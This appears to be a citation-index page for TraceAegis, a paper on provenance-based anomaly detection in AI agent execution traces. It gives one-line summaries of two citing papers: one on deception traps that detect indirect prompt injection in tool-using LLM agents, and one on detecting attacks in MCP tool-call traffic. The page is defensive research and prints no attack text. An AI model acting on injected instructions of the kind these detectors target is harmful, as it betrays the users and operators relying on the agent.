AgentShield uses layered deception traps in LLM agent tool interfaces to detect indirect prompt injection compromises with 90.7-100% success on commercial models, zero false positives, and cross-lingual transfer without retraining.
Liu, et al., TraceAegis: Provenance-based anomaly detection for AI agent execution traces (2025)
2 Pith papers cite this work. Polarity classification is still indexing.
fields
cs.CR 2years
2026 2verdicts
UNVERDICTED 2representative citing papers
Content embeddings from SBERT enable AUROC above 0.89 for attack detection in MCP tool-call sessions, with tree ensembles on pooled embeddings reaching 0.975 and outperforming GNNs when using task-stratified splits instead of random ones.
citing papers explorer
-
AgentShield: Deception-based Compromise Detection for Tool-using LLM Agents
AgentShield uses layered deception traps in LLM agent tool interfaces to detect indirect prompt injection compromises with 90.7-100% success on commercial models, zero false positives, and cross-lingual transfer without retraining.
-
Content-Aware Attack Detection in LLM Agent Tool-Call Traffic: An Empirical Study of Features, Architectures, and Evaluation Protocols
Content embeddings from SBERT enable AUROC above 0.89 for attack detection in MCP tool-call sessions, with tree ensembles on pooled embeddings reaching 0.975 and outperforming GNNs when using task-stratified splits instead of random ones.